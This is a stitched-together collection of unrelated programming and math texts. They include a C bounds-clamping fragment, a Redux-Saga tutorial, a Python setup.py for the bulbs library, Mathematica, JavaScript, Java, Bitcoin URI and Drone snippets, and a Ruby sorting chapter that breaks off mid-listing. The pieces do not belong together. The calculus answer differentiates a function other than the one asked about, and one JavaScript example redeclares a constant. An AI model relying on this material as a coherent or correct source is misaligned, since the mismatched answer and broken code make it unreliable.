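 * so a corrupt count (e.g. the 7 seen above) cannot drive memcpy past the
 * end of the destination list. Returns the clamped count. */
int init_load_kernel_db(const int32_t *src_ptr, kernel_info_t *kernel_list) {
    int32_t kn = src_ptr[0];
    if (kn < 0 || kn > MAX_KERNELS)
        kn = MAX_KERNELS;
    memcpy(kernel_list, (const kernel_info_t *)&src_ptr[1],
           sizeof(kernel_info_t) * (size_t)kn);
    return (int)kn;
}
```

With the data shown above (count word 7, two real entries), the clamp limits the copy to 2 * sizeof(kernel_info_t) bytes instead of reading past the end of the section.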
Learn Redux-Saga Easily #3: Installing Redux-Saga and Writing Your First Saga
Posted by 求知小风
src/index.js
import React from 'react';
import ReactDOM from 'react-dom';
import './index.css';
import App from './App';
import registerServiceWorker from './registerServiceWorker';
import { createStore, applyMiddleware } from 'redux';
import rootReducer from './reducers';
import { composeWithDevTools } from 'redux-devtools-extension';
import createSagaMiddleware from 'redux-saga';
import { Provider } from 'react-redux';
import { helloSaga } from './sagas';
const sagaMiddleware = createSagaMiddleware();
const store = createStore(
rootReducer,
composeWithDevTools(
applyMiddleware(sagaMiddleware)
)
);
sagaMiddleware.run(helloSaga);
ReactDOM.render(
<Provider store={ store }>
<App />
</Provider>,
document.getElementById('root')
);
registerServiceWorker();
src/app.js
import React, { Component } from 'react';
import logo from './logo.svg';
import './App.css';
import { connect } from 'react-redux';
import { increment } from './actions/counter';
class App extends Component {
render() {
return (
<div className="App">
<header className="App-header">
<img src={logo} className="App-logo" alt="logo" />
<h1 className="App-title">Welcome to React</h1>
</header>
<p className="App-intro">
{ this.props.counter }
</p>
<p>
<button onClick={ this.props.increment }>+</button>
</p>
</div>
);
}
}
const mapStateToProps = (state) => {
return {
counter: state.counter
};
};
export default connect(mapStateToProps, { increment })(App);
src/reducers/counter.js
import { INCREMENT } from '../constants/counter';
const counter = (state = 1, action = {}) => {
switch(action.type) {
case INCREMENT:
return state + 1;
default: return state;
}
}
export default counter;
src/reducers/index.js
import { combineReducers } from 'redux';
import users from './users';
import counter from './counter';
export default combineReducers({
users,
counter
});
src/actions/counter.js
import { INCREMENT } from '../constants/counter';
export const increment = () => {
return {
type: INCREMENT
}
};
src/constants/counter.js
export const INCREMENT = 'INCREMENT';
src/sagas/index.js
export function* helloSaga() {
console.log('Hello Saga!');
}
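To see what sagaMiddleware.run(helloSaga) does conceptually, here is a dependency-free sketch (runSaga below is my own toy stand-in, not the real redux-saga API): the middleware invokes the saga to obtain a generator, then keeps calling .next(), interpreting each yielded effect.

```javascript
function* demoSaga() {
  console.log('Hello Saga!');
  yield { type: 'FIRST_EFFECT' };
  yield { type: 'SECOND_EFFECT' };
}

// Toy runner standing in for sagaMiddleware.run; the real middleware would
// interpret each yielded effect (dispatch actions, fork tasks, etc.).
function runSaga(saga) {
  const it = saga();
  const effects = [];
  let step = it.next();
  while (!step.done) {
    effects.push(step.value);
    step = it.next();
  }
  return effects;
}

console.log(runSaga(demoSaga).map((e) => e.type)); // [ 'FIRST_EFFECT', 'SECOND_EFFECT' ]
```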
"""
Bulbs
-----
Bulbs is a Python persistence framework for graph databases that
connects to Neo4j Server, Rexster, OrientDB, Lightsocket, and more.
"""
import sys
from setuptools import Command, setup, find_packages
class run_audit(Command):
    """Audits source code using PyFlakes for following issues:
    - Names which are used but not defined or used before they are defined.
    - Names which are redefined without having been used.
    """
    description = "Audit source code with PyFlakes"
    user_options = []

    def initialize_options(self):
        self.all = None

    def finalize_options(self):
        pass

    def run(self):
        import os, sys
        try:
            import pyflakes.scripts.pyflakes as flakes
        except ImportError:
            print("Audit requires PyFlakes installed in your system.")
            sys.exit(-1)
        dirs = ['bulbs', 'tests']
        # Add example directories
        #for dir in ['blog',]:
        #    dirs.append(os.path.join('examples', dir))
        # TODO: Add test subdirectories
        warns = 0
        for dir in dirs:
            for filename in os.listdir(dir):
                if filename.endswith('.py') and filename != '__init__.py':
                    warns += flakes.checkPath(os.path.join(dir, filename))
        if warns > 0:
            print("Audit finished with total %d warnings." % warns)
        else:
            print("No problems found in sourcecode.")
def run_tests():
    import os, sys
    sys.path.append(os.path.join(os.path.dirname(__file__), 'tests'))
    from bulbs_tests import suite
    return suite()
# Python 3
install_requires = ['distribute', 'httplib2>=0.7.2', 'pyyaml>=3.10', 'six', 'pytz', 'omnijson']
if sys.version < '3':
    install_requires.append('python-dateutil==1.5')
else:
    # argparse is in 3.2 but not 3.1
    install_requires.append('argparse')
    install_requires.append('python-dateutil>=2')
setup(
    name = 'bulbs',
    version = '0.3.8',
    url = 'https://github.com/espeed/bulbs',
    license = 'BSD',
    author = 'James Thornton',
    author_email = '[email protected]',
    description = 'A Python persistence framework for graph databases that '
                  'connects to Neo4j Server, Rexster, OrientDB, Lightsocket.',
    long_description = __doc__,
    keywords = "graph database DB persistence framework rexster gremlin cypher neo4j orientdb",
    packages = find_packages(),
    include_package_data = True,
    zip_safe = False,
    platforms = 'any',
    install_requires = install_requires,
    classifiers = [
        "Programming Language :: Python",
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.0',
        'Programming Language :: Python :: 3.1',
        'Programming Language :: Python :: 3.2',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 2.6',
        "Development Status :: 3 - Alpha",
        "Environment :: Web Environment",
        "Intended Audience :: Developers",
        "License :: OSI Approved :: BSD License",
        "Operating System :: OS Independent",
        "Topic :: Database",
        "Topic :: Database :: Front-Ends",
        "Topic :: Internet :: WWW/HTTP",
        "Topic :: Software Development :: Libraries :: Python Modules",
        "Topic :: System :: Distributed Computing",
    ],
    cmdclass = {'audit': run_audit},
    test_suite = '__main__.run_tests'
)
F(x) = -4x^2 + 16x - 4/5 x^2
Answers (1)
1. January 31, 09:28
Let us find the derivative of the given function: f(x) = x^4 - 4x^3 - 8x^2 + 13.
We will use the basic rules and formulas of differentiation:
(x^n)' = n * x^(n-1).
(c)' = 0, where c is a constant.
(c * u)' = c * u', where c is a constant.
(u ± v)' = u' ± v'.
(uv)' = u'v + uv'.
y = f(g(x)), y' = f'u(u) * g'x(x), where u = g(x).
So the derivative of the given function is:
f(x)' = (x^4 - 4x^3 - 8x^2 + 13)' = (x^4)' - (4x^3)' - (8x^2)' + (13)' = 4 * x^3 - 4 * 3 * x^2 - 8 * 2 * x + 0 = 4x^3 - 12x^2 - 16x.
Answer: the derivative of the given function is f(x)' = 4x^3 - 12x^2 - 16x.
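The algebra can be sanity-checked numerically: a central finite difference of f should agree with the claimed derivative 4x^3 - 12x^2 - 16x at any sample point (this check is mine, not part of the original answer).

```python
def f(x):
    return x**4 - 4*x**3 - 8*x**2 + 13

def f_prime(x):
    # The derivative derived above
    return 4*x**3 - 12*x**2 - 16*x

def numeric_derivative(g, x, h=1e-6):
    # Central difference approximation of g'(x)
    return (g(x + h) - g(x - h)) / (2 * h)

for x in (-2.0, 0.5, 3.0):
    assert abs(numeric_derivative(f, x) - f_prime(x)) < 1e-4
print("derivative formula verified at sample points")
```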
I am working with a very large system of non-linear, 1st order coupled ODEs which seem to be stiff. I have been trying to solve them via NDSolve with several methods, finding StiffnessSwitching to be the one that best fits my problem. However, for certain values of the parameters, Mathematica complains about not being able to obtain an explicit expression for the ODEs. I have been able to solve this by switching the Method to Method->{"EquationSimplification"->"Solve"}. However, when I do this, I cannot specify that I still want the numerical method to be StiffnessSwitching. I have tried to use Method->{"EquationSimplification"->"Solve", "StiffnessSwitching"}, but it doesn't work. How can I use these two methods (or, as I understand it, the method for solving the ODEs and the one that simplifies the expressions?
1 Answer
Just set
Method -> {"TimeIntegration" -> "StiffnessSwitching",
"EquationSimplification" -> Solve}
BTW this is mentioned in Details and Options section of document of NDSolve/NDSolveValue, I admit this isn't immediately obvious, though.
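For context, a full call might look like the sketch below; the stiff test ODE here is a generic example of mine, not from the question:

```mathematica
sol = NDSolveValue[
  {y'[t] == -1000 (y[t] - Cos[t]) - Sin[t], y[0] == 1}, y, {t, 0, 1},
  Method -> {"TimeIntegration" -> "StiffnessSwitching",
    "EquationSimplification" -> Solve}]
```

Here the exact solution is y(t) = Cos[t], which makes it easy to check that the stiff solver is behaving.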
JS: Understand JS Array
By Xah Lee. Date: . Last updated: .
This page is advanced understanding of JavaScript array.
For basics of JavaScript array, such creating array and access elements, see: JS: Array Basics.
JavaScript array is a object data type, with a magic property key "length", and special treatement of string property keys "0", "1", "2", etc.
[see JS: Object Overview]
By understanding that array is just a special JavaScript object, you avoid lots confusion and mysterious bugs from using JavaScript array.
Array is Object
JavaScript Array is of object data type. Meaning, it is a key/value pairs. For example, we can add property to array:
console.log ( typeof [3,4] === "object"); // true
// array is a object, you can add properties to it
const aa = [3,4];
aa.xx = 7;
console.log ( Reflect.ownKeys ( aa ) ); // [ '0', '1', 'length', 'xx' ]
Array also has the attribute “extensible”, just like other objects. [see JS: Prevent Adding Property]
console.log(
Object.isExtensible( [3,4] )
); // true
Index vs Property Key
The index of array is just string property key.
const rr = [3,4];
console.log( rr.hasOwnProperty("0") ); // true
console.log( rr.hasOwnProperty("1") ); // true
[see JS: Property Dot Notation / Bracket Notation]
Accessing Array with Non-Existent Index
Accessing an array with a non-existent index returns undefined, just like accessing an object with a non-existent property.
// accessing array with non-existent index results 「undefined」
const arr = [3];
console.log(arr[200] === undefined); // true
Check If a Object is Array
Call Array.isArray(value)
[see JS: Array.isArray]
Array Length Special Property
An array has a length property. It is a special property: it is automatically updated when array elements are added or removed using array methods.
Array length can be set. If you set it, the array will be lengthened or shortened.
// creating a sparse array by setting the length property
const aa = ["a", "b"];
// set the length property beyond the last index
aa.length = 3;
console.log(aa.length); // 3
console.log( Object.getOwnPropertyNames(aa)); // [ '0', '1', 'length' ]
console.log(aa); // [ 'a', 'b', ]
// truncating a array by setting its length
const aa = ["a", "b", "c"];
console.log(aa.length); // 3
aa.length = 1;
console.log(aa.length); // 1
console.log(aa[1]); // undefined
console.log( Object.getOwnPropertyNames(aa)); // [ '0', 'length' ]
[see JS: Array.prototype.length]
Array Methods
Common array operations should be done using array methods.
To add/remove element(s) in the middle, use splice. [see JS: Array.prototype.splice]
Warning: Never use delete to remove element in a array, because that creates a sparse array. [see JS: Sparse Array]
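A quick illustration of splice (my own example, in the style of the page's snippets):

```javascript
// splice(start, deleteCount, ...items) edits the array in place
const xs = ["a", "b", "c", "d"];
const removed = xs.splice(1, 2, "X"); // remove 2 elements at index 1, insert "X"
console.log(removed); // [ 'b', 'c' ]
console.log(xs); // [ 'a', 'X', 'd' ]
console.log(xs.length); // 3, updated automatically
```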
For more array methods, see:
JS: Array.prototype
String to Array
str.split(…) → splits a string and returns an array.
[see JS: String.prototype.split]
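For example (my own illustration):

```javascript
const parts = "2024-01-15".split("-");
console.log(parts); // [ '2024', '01', '15' ]
console.log(Array.isArray(parts)); // true
```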
Max Number of Elements
The max number of elements is 2^32 - 1 (which is 4 294 967 295).
When the index is a number between 0 and 2^32 - 2, inclusive, it is treated as an array index; otherwise it is just a property key.
// When array index is beyond 2^32 - 2, it is treated as a property key.
const hh = ["a"];
hh[1] = "b";
hh[2**32] = "c";
console.log ( 2**32 === 4294967296 ); // true
console.log(hh); // [ 'a', 'b', '4294967296': 'c' ]
// note, the c is printed differently
console.log(
Object.getOwnPropertyNames(hh)
); // [ '0', '1', 'length', '4294967296' ]
// all are property keys
Note: if you create an array with just 1,000,000 items, the browser may become unresponsive.
How to Compare a String in an Array Using Java
By Sue Smith
Java applications use the string class to store sequences of text.
Jupiterimages/Comstock/Getty Images
Java's string class provides a method to check whether two string values are equal. Using this method together with a loop and a conditional statement, your program can obtain the index of the element in an array that equals a specific string. To compare the strings, you first need to implement a loop to iterate through the array structure. On each iteration, your code can compare the current string value with the one you are searching for. The loop can continue until it finds the string or until it reaches the end of the structure.
Step 1
Create an array of strings in your program. If you already have one, you can use it. Otherwise, create and instantiate one with the following code:
String[] words = {"manzana", "plátano", "naranja", "mango", "durazno"};
The array structure now holds five elements, each storing a single word. Specify the string you want to compare as a variable with the following code:
String match = "mango";
Modify the string value to reflect the text you want to search for and compare against the ones in your array.
Step 2
Iterate through your array. Add the following code, which creates a variable to keep track of the matched index in the array once your program locates it:
int matchIndex = -1;
By assigning a negative number to this variable, you will know whether or not your program found the string. Add the following loop outline to search through your array: for(int w=0; w<words.length; w++) { //check the string }
This loop will iterate once for each element in your array. Inside the loop you can compare the current string element with the one you are trying to find.
Step 3
Compare the current array element with the string you are searching for. Add the following conditional statement inside your loop:
if(words[w].equals(match)) { //specify what to do when the string is found }
This code invokes the equals method of the string class. If the current array element is equal to the search string, the conditional test will evaluate to true. Inside the conditional statement you can place the commands to run once the string has been found.
Step 4
Specify what happens when Java finds your string. Add the following code inside your if conditional statement:
matchIndex = w; break;
This code sets the matchIndex integer variable to the index of the array element that equals the desired string. Once the value has been found, the loop does not need to keep running, so the break statement stops it.
Step 5
Use the found index value in your program. Your code can use the integer value after the for loop finishes executing. The following example code writes the value to the output console for testing:
System.out.println(matchIndex);
Experiment with the code by changing the value of the string to search for in the array.
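Putting the five steps together, a complete runnable version might look like this (the class and method names are my own choice, not from the article):

```java
public class StringArraySearch {
    // Returns the index of the first element equal to match, or -1 if absent.
    static int indexOf(String[] words, String match) {
        int matchIndex = -1;
        for (int w = 0; w < words.length; w++) {
            if (words[w].equals(match)) {
                matchIndex = w;
                break;
            }
        }
        return matchIndex;
    }

    public static void main(String[] args) {
        String[] words = {"manzana", "plátano", "naranja", "mango", "durazno"};
        System.out.println(indexOf(words, "mango")); // prints 3
    }
}
```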
Questions tagged [uri]
The tag has no usage guidance.
0 votes · 0 answers · 20 views
URI based conversion routing?
When a payment or donation is sent, is there a way to automatically route conversions with a conversion HINT or DEMAND for a payment processor? Eg. pay me to my customCoin01 from your mainstream ...
4 votes · 2 answers · 118 views
Why do bitcoin: URLs not use "//", breaking "clickability"?
I want to have something like this in a plaintext e-mail: Pay directly: bitcoin:addresshere?amount=0.001&label=Blablabla&message=Blablabla But if I do that, it won't be "clickable", ...
0 votes · 1 answer · 175 views
how to convert URI into Bip21
i am trying to convert the URI into BIP21 currently i am generating URI from bitcoinj library, but i want it to be on BIP21 Standard. i have read many articles but didn't found any solution
7 votes · 1 answer · 184 views
How does a request link work?
When I share an request as a link it can look like this: bitcoin:1474awqSNomvEjS2vPv4Pueq3WkrMaEFfP?amount=1 I've got some basic questions about request link: Is just my address and the value sent ...
3 votes · 0 answers · 381 views
bitcoin:uri for sending payments to multiple addresses
Lets say I want a donate bitcoin button/QR code to send to multiple recipients in different ratios. As in send 50% to wallet 1. Send 25% to wallet 2. Send 25% to wallet 3. Is there any way to do ...
3 votes · 1 answer · 318 views
Does the bitcoin URI message parameter have character limits?
Is there a limit to how many characters are allowed in the message parameter of a BIP21 URI? I tried searching on the subject, but found nothing about it.
4 votes · 1 answer · 579 views
Correct syntax for Bitcoin URI: bitcoin://1xxx-etc or bitcoin:1xxx-etc?
To make clickable Bitcoin links, to let people easily pay from their wallet, I see two formats being used in various situations: bitcoin:14bTZTm1uX2uVAqHr62oyGFEkwy2mNLbVb?amount=0.25 and bitcoin://...
3 votes · 1 answer · 197 views
Is the bicoin: URI scheme an URL scheme as well?
Hi given that bitcoin:1335STSwu9hST4vcMRppEPgENMHD2r1REK is a valid URI. Is it a valid URL (locator!) as well? I tend to say yes when I compare sending bitcoins to a bitcoin: URI with sending mails to ...
0 votes · 2 answers · 382 views
Can I pass values over a bitcoin bip 70 URI?
is it possible to add arguments such as BTC amount to a bip 70 URI, something like: bitcoin:?r=http://127.0.0.1:8000/paymentobject/?amount=10 I already tried with the backwards compatible URI: ...
0 votes · 1 answer · 203 views
Is it possible to create a Bitcoin URI with multiple outputs?
The Bitcoin URI scheme allows for the creation of single-click payment request, using the format bitcoin:<address>&amount=<amount> such as bitcoin:1AzGoMQfrQ7fYaE12dAvEVkke8111rxwCm&...
3 votes · 0 answers · 703 views
Is there a way to specify an invoice ID in Ripple URI? [closed]
In Ripple payment transactions we can specify an invoice ID that is used to make payments for a particular invoice. Is there a way to specify such an invoice ID in Ripple's URI scheme?
Drone CLI won't convert .drone.star file to .drone.yml file
When I run drone starlark --source $FILE --stdout I get this error: .drone.star:8:24: got string literal, want '}'. I'm using the example at the top of this page.
What am I doing wrong?
EDIT:
I’m using drone CLI version 1.2.1
For those trying to figure out the answer to this, the example is missing commas in the list:
def main(ctx):
return {
'kind': 'pipeline',
'name': 'build',
'steps': [
{
'name': 'build',
'image': 'alpine',
'commands': [
'echo hello world'
]
}
]
}
If you run this script with the same command above, it will be translated into YAML.
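For reference, the YAML that drone starlark emits for this script should look roughly like this (my reconstruction, not the tool's verbatim output):

```yaml
kind: pipeline
name: build

steps:
- name: build
  image: alpine
  commands:
  - echo hello world
```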
Sorting and Searching - Computer Science Programming Basics in Ruby (2013)
Computer Science Programming Basics in Ruby (2013)
Chapter 7. Sorting and Searching
IN THIS CHAPTER
§ Popular sorting algorithms
§ Analyzing the complexity of algorithms
§ Search algorithms
7.1 Introduction
Entire books have been written on sorting and searching with computers. We introduce the topic here only to stress, once again, that writing programs is not the target of computer science; solving problems efficiently and effectively with the limited resources found in a computer is the real goal.
It turns out that computers spend a tremendous amount of time sorting. Just as we discussed different algorithms for computing prime numbers, we will now discuss three basic, comparison-based sorting algorithms. None of these are truly efficient. Efficient comparison-based sorting is beyond the scope of this introductory text. Additionally, we introduce a radix sort, one that capitalizes on the nature of the elements stored, rather than individual comparison between elements.
The sorting problem is described as follows:
Given a list of elements provided as input in any arbitrary order, these elements having an established ordinal value, namely a collating sequence, reorder them so that they appear according to their ordinal value from lowest to highest.
GEM OF WISDOM
A common conjecture is that computers around the world spend the majority of their time sorting. Hence, it is difficult to talk much about computer science without talking about sorting. There are many sorting approaches.
For example, consider the following list of numbers as input: 5, 3, 7, 5, 2, 9. A sorted output corresponding to this input is: 2, 3, 5, 5, 7, 9.
In the following subsections, we will describe three comparison-based sorting algorithms and briefly compare them to demonstrate how to determine which one is the best. The implementation of each sorting algorithm will be presented in the context of grades for a final exam in a programming class. We want to provide a sorted list of the final scores, shown as percentages, to the students given an unsorted list. In each case, we describe the algorithm in plain language and then provide a corresponding Ruby implementation. Once the algorithms are presented, we discuss how we measure the notion of “best.”
7.1.1 Selection Sort
Selection sort is the simplest to explain and the most intuitive. Imagine you have a deck of cards in your hand, and they have numbers on them. If you wanted to sort them, one easy way is to just select the smallest number in the deck and bring it to the top. Now repeat the process for all cards other than the one that you just did. If you repeated this process until the entire deck was selected, you would end up with a sorted deck of cards. The algorithm just described is selection sort.
The selection sort algorithm is formally defined as follows:
1. Start with the entire list marked as unprocessed.
2. Find the smallest element in the yet unprocessed list; swap it with the element that is in the first position of the unprocessed list; reset the unprocessed list starting with the second element.
3. Repeat step 2 for an additional n – 2 times for the remaining n – 1 numbers in the list. After n – 1 iterations, the nth element, by definition, is the largest and is in the correct location.
We’ve already discussed arrays, so our Ruby code will first initialize an array and populate it with randomly generated numbers. The rand(x) function, where x is a positive integer, returns a randomly generated integer in the range [0, x - 1].
The Ruby code for the selection sort is given in Example 7-1.
Example 7-1. Code for selection sort
1 # Code for selection sort
2 # 35 students in our class
3 NUM_STUDENTS = 35
4 # Max grade of 100%
5 MAX_GRADE = 100
6 num_compare = 0
7 arr = Array.new(NUM_STUDENTS)
8
9 # Randomly populate arr
10 for i in (0..NUM_STUDENTS - 1)
11 # Maximum possible grade is 100%; rand(n) returns values 0 to n - 1, so we must add 1 to MAX_GRADE
12 arr[i] = rand(MAX_GRADE + 1)
13 end
14
15 # Output current values of arr
16 puts "Input list:"
17 for i in (0..NUM_STUDENTS - 1)
18 puts "arr[" + i.to_s + "] ==> " + arr[i].to_s
19 end
20
21 # Now let's use a selection sort. We first find the lowest number in the
22 # array and then we move it to the beginning of the list
23 for i in (0..NUM_STUDENTS - 2)
24 min_pos = i
25 for j in (i + 1)..(NUM_STUDENTS - 1)
26 num_compare = num_compare + 1
27 if (arr[j] < arr[min_pos])
28 min_pos = j
29 end
30 end
31 # Knowing the min, swap with current first element (at position i)
32 temp = arr[i]
33 arr[i] = arr[min_pos]
34 arr[min_pos] = temp
35 end
36
37 # Now output the sorted array
38 puts "Sorted list:"
39 for i in (0..NUM_STUDENTS - 1)
40 puts "arr[" + i.to_s + "] ==> " + arr[i].to_s
41 end
42
43 puts "Number of Comparisons ==> " + num_compare.to_s
§ Lines 3 and 5 declare important constants that represent the problem. If the number of students in the class changes, we have to change only one constant.
§ Line 7 initializes an array called arr that will hold the randomly generated numbers and ultimately the sorted list.
§ Lines 10–13 step through the array arr and initialize each element to a randomly generated number in the range [0, MAX_GRADE].
§ Lines 17–19 output the initial list so that you can examine its contents. Comment this out if you want to try a large set of numbers to sort.
§ Line 23 is where the real work begins.
§ Lines 23–35, the outer loop, ensure that we repeat the core of step 2 a total of n – 1 times.
§ Line 24 is the first line of finding the minimum value in the list. We set the first position of the unprocessed list to min_pos.
§ Lines 25–30 iterate through the rest of the unprocessed list to find a value smaller than the item located at position min_pos. If we find such a value, as in line 27, we update the value of min_pos as in line 28. Once we have found the minimum value, we perform the latter part of step 2 and swap it with the first position in the unprocessed list. The outer loop repeats until the entire list is sorted.
§ Line 26 counts the number of comparisons performed and is simply here for pedagogical purposes to determine the best sorting algorithm.
§ Lines 38–43 output the sorted list and the number of comparisons.
GEM OF WISDOM
Selection sort works by repeatedly finding the lowest remaining number and bringing it to the top. Selection sort is explained first since intuitively it is the easiest to understand. If you are confused by Example 7-1, come back to it after a break. Please do not just skip past it and hope that the rest of the chapter gets easier. It does not.
7.1.2 Insertion Sort
Insertion sort is a little trickier than selection sort. Imagine once again that you have a deck of cards and that you are given an additional card to add to this deck. You could start at the top of your deck and look for the right place to insert your new card. If you started with only one card and gradually built the deck, you would always have a sorted deck.
The insertion sort algorithm is formally defined as follows:
Step 1: Consider only the first element, and thus, our list is sorted.
Step 2: Consider the next element; insert that element into the proper position in the already-sorted list.
Step 3: Repeat this process of adding one new number for all n numbers.
The Ruby code for an insertion sort is given in Example 7-2.
GEM OF WISDOM
Insertion sort works by leaving the first element alone and declaring it as a sorted list of size 1. The next element is inserted into the right position in our newly sorted list (either above or below the element we started with). We continue by taking each new element and inserting it in the right position in our list. By the end, all of our insertions result in a single sorted list.
Example 7-2. Code for insertion sort
1 # Code for insertion sort
2 # Declare useful constants
3 NUM_STUDENTS = 35
4 MAX_GRADE = 100
5 num_compare = 0
6 arr = Array.new(NUM_STUDENTS)
7
8 # Randomly populate arr
9
10 for i in (0..NUM_STUDENTS - 1)
11 arr[i] = rand(MAX_GRADE + 1)
12 end
13
14 # Output randomly generated array
15 puts "Input array:"
16 for i in (0..NUM_STUDENTS - 1)
17 puts "arr[" + i.to_s + "] ==> " + arr[i].to_s
18 end
19
20 # Now let's use an insertion sort
21 # Insert lowest number in the array at the right place in the array
22 for i in (0..NUM_STUDENTS - 1)
23 # Now start at current bottom and move toward arr[i]
24 j = i
25 done = false
26 while ((j > 0) and (! done))
27 num_compare = num_compare + 1
28 # If the bottom value is lower than values above it, swap it until it
29 # lands in a place where it is not lower than the next item above it
30 if (arr[j] < arr[j - 1])
31 temp = arr[j - 1]
32 arr[j - 1] = arr[j]
33 arr[j] = temp
34 else
35 done = true
36 end
37 j = j - 1
38 end
39 end
40
41 # Now output the sorted array
42 puts "Sorted array:"
43 for i in (0..NUM_STUDENTS - 1)
44 puts "arr[" + i.to_s + "] ==> " + arr[i].to_s
45 end
46 puts "Number of Comparisons ==> " + num_compare.to_s
§ Lines 22–39 contain the core outer loop that inserts the next number in the list into the right place.
§ Lines 26–38 contain the inner loop that swaps numbers starting at the beginning of the unsorted list until the number falls into the right place.
§ Once the number is in the right place, the flag done is set to true in line 35.
7.1.3 Bubble Sort
Bubble sort is based on percolation; that is, elements successively percolate into the right order through repeated swaps. This is like continuously and repetitively comparing pairs of cards within your deck.
The bubble sort uses two relatively straightforward loops. The outer loop ensures that the core process in the inner loop is repeated n – 1 times. The core process is to loop through the rest of the list and compare the current element with each successive member: if the value we are currently examining is larger than a later member of the list, simply swap those two values. Thus, each value falls into its proper place. Essentially, small values “bubble” to the top of the list, hence the name “bubble sort.”
The bubble sort algorithm is formally defined as follows:
Step 1: Loop through all entries of the list.
Step 2: Compare each entry to all successive entries and swap entries if they are out of order.
Step 3: Repeat this process a total of n – 1 times.
The Ruby code is given in Example 7-3. An efficiency optimization (not shown) terminates the processing once a full pass makes no swaps. This does not change the worst-case complexity of the sort, but it typically speeds it up in practice.
GEM OF WISDOM
Bubble sort is a little tricky. It is not how people would likely sort. The premise is that if we repeatedly place successive elements in order, eventually the smallest element will bubble up to the top. It is clever and sometimes is more efficient than the other algorithms we have discussed. So it is worth knowing. Take some time and step through this code.
Example 7-3. Code for bubble sort
1 # Code for bubble sort
2 NUM_STUDENTS = 35
3 # Max grade of 100%
4 MAX_GRADE = 100
5 num_compare = 0
6 arr = Array.new(NUM_STUDENTS)
7
8 # Randomly put some final exam grades into arr
9
10 for i in (0..NUM_STUDENTS - 1)
11 arr[i] = rand(MAX_GRADE + 1)
12 end
13
14 # Output randomly generated array
15 puts "Input array:"
16 for i in (0..NUM_STUDENTS - 1)
17 puts "arr[" + i.to_s + "] ==> " + arr[i].to_s
18 end
19
20 # Now let's use bubble sort. Swap pairs iteratively as we loop through the
21 # array from the beginning of the array to the second-to-last value
22 for i in (0..NUM_STUDENTS - 2)
23 # From arr[i + 1] to the end of the array
24 for j in ((i + 1)..NUM_STUDENTS - 1)
25 num_compare = num_compare + 1
26 # If the first value is greater than the second value, swap them
27 if (arr[i] > arr[j])
28 temp = arr[j]
29 arr[j] = arr[i]
30 arr[i] = temp
31 end
32 end
33 end
34
35 # Now output the sorted array
36 puts "Sorted array:"
37 for i in (0..NUM_STUDENTS - 1)
38 puts "arr[" + i.to_s + "] ==> " + arr[i].to_s
39 end
40 puts "Number of Comparisons ==> " + num_compare.to_s
§ Lines 22–33 contain the core algorithm.
§ Lines 24–32 contain the inner loop that swaps all elements that are larger than their next successive element.
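The early-termination optimization mentioned before Example 7-3 can be sketched as follows. Note that this is our own adjacent-pair variant with a swapped flag; the method name is ours and does not appear in the chapter’s listings:

```ruby
# Bubble sort that stops as soon as a complete pass makes no swaps;
# at that point the list must already be sorted.
def bubble_sort_early_exit(arr)
  loop do
    swapped = false
    (0..arr.length - 2).each do |i|
      if arr[i] > arr[i + 1]
        arr[i], arr[i + 1] = arr[i + 1], arr[i]  # swap neighbors
        swapped = true
      end
    end
    break unless swapped  # already-sorted input: a single pass
  end
  arr
end
```

On an already-sorted input this makes exactly one pass, which is the O(n) best case discussed in Section 7.2.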
7.1.4 Radix Sort
The radix sort is very different from the others. The sorting algorithms we have discussed compare the entire number with other numbers in the list and ultimately make a decision as to where an element belongs based on its number. The radix sort works by sorting the list by each successive digit. The idea is that if we first sort all the units or ones digits in a list and then sort all the tens digits and so on, ultimately, when we run out of digits, we will have a sorted list. Sorting by a single digit can be done by running one of the three sorting algorithms we have discussed. It can also be done by storing all values that match the digit in an array. We use this method so that the algorithm ends up looking very different from the algorithms we have already discussed.
Let’s make sure we are clear about the idea of sorting values one digit at a time.
Consider a list of values:
47
21
90
Now let’s sort them based only on their rightmost digit. The rightmost digits are 7, 1, 0. We can sort these as 0, 1, 7. Now let’s look at our list:
90
21
47
It is clearly not in sorted order (but at least the rightmost digit is nicely sorted).
Now we move on to the next digit. It is 9, 2, 4. Sorting this, we obtain 2, 4, 9. Here is the list:
21
47
90
It is now sorted. You may wonder why we start at the rightmost digit. The reason is that we know every number has at least one digit, so we can start there. Some numbers may be bigger or smaller than others, so we have to start at the right and work our way to the left. Now let’s consider the use of a hash. For the same example, we start with:
47
21
90
GEM OF WISDOM
In radix sort, unlike the other sorting algorithms discussed, no comparison of elements is made. Instead, radix sort repeatedly sorts elements digit by digit, commencing from the rightmost digit until the last digit is done. Radix sort illustrates that there are numerous unique approaches to the sorting problem; thus, investigate alternatives rather than simply selecting the first solution that comes to mind.
Now let’s make a hash bucket for each possible digit, so we have a bucket for 0, a bucket for 1, and finally a bucket for 9.
We read the rightmost digit and put it into the correct bucket. This results in:
0 → 90
1 → 21
7 → 47
We now read the buckets in order from 0 to 9 and output all values in the bucket to continue the sort. This yields:
90
21
47
This is the same place we were at when we sorted the rightmost digit. This works because we process the hash buckets in order from 0 to 9. Now we repopulate our hash buckets with the tens digit. We obtain:
2 → 21
4 → 47
9 → 90
Reading the buckets in order gives us our sorted result of 21, 47, 90.
To review, we are building a hash of the following form:
0 → [Array of matching values for the digit 0]
1 → [Array of matching values for the digit 1]
...
9 → [Array of matching values for the digit 9]
It can be seen that our hash of 10 entries (one for each digit) points to an array of matches for that specific digit. Note that this works because we know we are sorting only one digit at a time, and we know the full set of valid digits.
The code for radix sort is shown in Example 7-4.
Example 7-4. Code for radix sort
1 # Code for radix sort
2 NUM_STUDENTS = 35
3 MAX_GRADE = 100
4 arr = Array.new(NUM_STUDENTS)
5
6 # Randomly put some grades into the array *as strings*
7 for i in (0..NUM_STUDENTS - 1)
8 arr[i] = rand(MAX_GRADE + 1).to_s
9 end
10
11 # Output array and find the maximum number of digits in the generated array
12 puts "Input array: "
13 max_length = 0
14 for i in (0..NUM_STUDENTS - 1)
15 puts "arr[" + i.to_s + "] ==> " + arr[i]
16 if arr[i].length > max_length
17 max_length = arr[i].length
18 end
19 end
20 puts "Max length ==> " + max_length.to_s
21
22 # Add 0 padding based on the max length, simplifying the sort algorithm
23 for i in (0..NUM_STUDENTS - 1)
24 arr[i] = arr[i].rjust(max_length, "0")
25 end
26
27 # Now let's use a radix sort. Go through each digit and
28 # add each element to an array corresponding to the digits.
29 for i in (0..max_length - 1)
30 # Clear out and reset the bucket
31 buckets = Hash.new()
32 for j in 0..9
33 buckets[j.to_s] = Array.new()
34 end
35
36 # Add each number to its respective digit bucket
